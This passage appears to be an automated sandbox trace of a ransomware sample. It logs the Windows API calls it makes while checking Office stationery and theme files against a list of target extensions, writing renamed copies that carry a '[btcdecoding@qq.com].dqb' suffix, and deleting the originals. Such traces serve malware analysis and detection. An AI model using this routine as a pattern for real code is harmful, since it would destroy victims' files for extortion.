(lpString=".bz2") returned 4 [0042.518] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.518] lstrlenW (lpString=".7z") returned 3 [0042.519] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.519] lstrlenW (lpString=".dbf") returned 4 [0042.519] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.519] lstrlenW (lpString=".1cd") returned 4 [0042.519] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg") returned 70 [0042.519] lstrlenW (lpString=".jpg") returned 4 [0042.519] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.519] lstrcmpiW (lpString1=".htm", lpString2=".dqb") returned 1 [0042.519] lstrlenW (lpString="Orange Circles.htm") returned 18 [0042.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.519] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=237) returned 1 [0042.519] CloseHandle (hObject=0x174) returned 1 [0042.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0042.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.519] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".doc") returned 4 [0042.520] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.520] lstrlenW (lpString=".docx") returned 5 [0042.520] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.520] lstrlenW (lpString=".pdf") returned 4 [0042.520] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString=".xls") returned 4 [0042.520] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString=".xlsx") returned 5 [0042.520] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.520] lstrlenW (lpString=".ppt") returned 4 [0042.520] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".zip") returned 4 [0042.520] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString=".rar") returned 4 [0042.520] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString=".bz2") returned 4 [0042.520] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.520] lstrlenW (lpString=".7z") returned 3 [0042.520] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".dbf") returned 4 [0042.520] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".1cd") returned 4 [0042.520] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".jpg") returned 4 [0042.520] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.520] lstrlenW (lpString=".doc") returned 4 [0042.520] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0042.520] lstrlenW (lpString=".docx") returned 5 [0042.521] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0042.521] lstrlenW (lpString=".pdf") returned 4 [0042.521] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0042.521] lstrlenW (lpString=".xls") returned 4 [0042.521] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0042.521] lstrlenW (lpString=".xlsx") returned 5 [0042.521] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0042.521] lstrlenW (lpString=".ppt") returned 4 [0042.521] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0042.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.521] lstrlenW (lpString=".zip") returned 4 [0042.521] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0042.521] lstrlenW (lpString=".rar") returned 4 [0042.521] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0042.521] lstrlenW (lpString=".bz2") returned 4 [0042.521] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0042.521] lstrlenW (lpString=".7z") returned 3 [0042.521] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0042.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.521] lstrlenW (lpString=".dbf") returned 4 [0042.521] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0042.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.521] lstrlenW (lpString=".1cd") returned 4 [0042.521] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0042.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm") returned 76 [0042.521] lstrlenW (lpString=".jpg") returned 4 [0042.521] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0042.521] lstrcmpiW (lpString1=".jpg", lpString2=".dqb") returned 1 [0042.521] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0042.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.522] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=6381) returned 1 [0042.522] CloseHandle (hObject=0x174) returned 1 [0042.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0x20 [0042.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.522] lstrlenW (lpString=".doc") returned 4 [0042.522] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.522] lstrlenW (lpString=".docx") returned 5 [0042.522] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.522] lstrlenW (lpString=".pdf") returned 4 [0042.522] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.522] lstrlenW (lpString=".xls") returned 4 [0042.522] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.522] lstrlenW (lpString=".xlsx") returned 5 [0042.522] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.522] lstrlenW (lpString=".ppt") returned 4 [0042.522] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.522] lstrlenW (lpString=".zip") returned 4 [0042.522] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.522] lstrlenW (lpString=".rar") returned 4 [0042.522] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.522] lstrlenW (lpString=".bz2") returned 4 [0042.522] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.523] lstrlenW (lpString=".7z") returned 3 [0042.523] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg") returned 75 [0042.523] lstrlenW (lpString=".dbf") returned 4 [0042.523] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.534] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.534] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.535] GetLastError () returned 0x0 [0042.535] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x621, lpOverlapped=0x0) returned 1 [0042.537] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x630, lpOverlapped=0x0) returned 1 [0042.538] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0042.538] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.538] SetEndOfFile (hFile=0x174) returned 1 [0042.538] CloseHandle (hObject=0x174) returned 1 [0042.538] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.538] SetEndOfFile (hFile=0x180) returned 1 [0042.539] CloseHandle (hObject=0x180) returned 1 [0042.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0042.539] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1 [0042.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.539] lstrlenW (lpString=".doc") returned 4 [0042.539] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.540] lstrlenW (lpString=".docx") returned 5 [0042.540] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.540] lstrlenW (lpString=".pdf") returned 4 [0042.540] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString=".xls") returned 4 [0042.540] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString=".xlsx") returned 5 [0042.540] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.540] lstrlenW (lpString=".ppt") returned 4 [0042.540] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString=".zip") returned 4 [0042.540] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString=".rar") returned 4 [0042.540] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString=".bz2") returned 4 [0042.540] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.540] lstrlenW (lpString=".7z") returned 3 [0042.540] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString=".dbf") returned 4 [0042.540] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString=".1cd") returned 4 [0042.540] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString=".jpg") returned 4 [0042.540] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.540] lstrlenW (lpString=".doc") returned 4 [0042.540] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0042.540] lstrlenW (lpString=".docx") returned 5 [0042.540] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0042.540] lstrlenW (lpString=".pdf") returned 4 [0042.540] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0042.541] lstrlenW (lpString=".xls") returned 4 [0042.541] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0042.541] lstrlenW (lpString=".xlsx") returned 5 [0042.541] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0042.541] lstrlenW (lpString=".ppt") returned 4 [0042.541] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.541] lstrlenW (lpString=".zip") returned 4 [0042.541] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0042.541] lstrlenW (lpString=".rar") returned 4 [0042.541] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0042.541] lstrlenW (lpString=".bz2") returned 4 [0042.541] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0042.541] lstrlenW (lpString=".7z") returned 3 [0042.541] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.541] lstrlenW (lpString=".dbf") returned 4 [0042.541] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.541] lstrlenW (lpString=".1cd") returned 4 [0042.541] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0042.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0042.541] lstrlenW (lpString=".jpg") returned 4 [0042.541] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0042.541] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0042.541] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0042.542] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=25234) returned 1 [0042.542] CloseHandle (hObject=0x180) returned 1 [0042.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20 [0042.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0042.543] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.543] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.543] GetLastError () returned 0x0 [0042.543] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x6292, lpOverlapped=0x0) returned 1 [0042.972] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x62a0, lpOverlapped=0x0) returned 1 [0042.973] ReadFile (in: hFile=0x180, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0042.973] WriteFile (in: hFile=0x174, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.973] SetEndOfFile (hFile=0x174) returned 1 [0042.973] CloseHandle (hObject=0x174) returned 1 [0042.973] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.973] SetEndOfFile (hFile=0x180) returned 1 [0042.974] CloseHandle (hObject=0x180) returned 1 [0042.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0042.975] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0042.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.975] lstrlenW (lpString=".doc") returned 4 [0042.975] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.975] lstrlenW (lpString=".docx") returned 5 [0042.975] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.975] lstrlenW (lpString=".pdf") returned 4 [0042.975] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.975] lstrlenW (lpString=".xls") returned 4 [0042.975] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.975] lstrlenW (lpString=".xlsx") returned 5 [0042.975] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.975] lstrlenW (lpString=".ppt") returned 4 [0042.975] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.975] lstrlenW (lpString=".zip") returned 4 [0042.975] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.975] lstrlenW (lpString=".rar") returned 4 [0042.975] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.975] lstrlenW (lpString=".bz2") returned 4 [0042.975] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.975] lstrlenW (lpString=".7z") returned 3 [0042.975] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.975] lstrlenW (lpString=".dbf") returned 4 [0042.976] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString=".1cd") returned 4 [0042.976] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString=".jpg") returned 4 [0042.976] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString=".doc") returned 4 [0042.976] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString=".docx") returned 5 [0042.976] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.976] lstrlenW (lpString=".pdf") returned 4 [0042.976] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString=".xls") returned 4 [0042.976] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.976] lstrlenW (lpString=".xlsx") returned 5 [0042.976] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.976] lstrlenW (lpString=".ppt") returned 4 [0042.976] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString=".zip") returned 4 [0042.976] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.976] lstrlenW (lpString=".rar") returned 4 [0042.976] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.976] lstrlenW (lpString=".bz2") returned 4 [0042.976] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.976] lstrlenW (lpString=".7z") returned 3 [0042.976] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.976] lstrlenW (lpString=".dbf") returned 4 [0042.976] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.977] lstrlenW (lpString=".1cd") returned 4 [0042.977] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.977] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0042.977] lstrlenW (lpString=".jpg") returned 4 [0042.977] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.977] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0042.977] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft 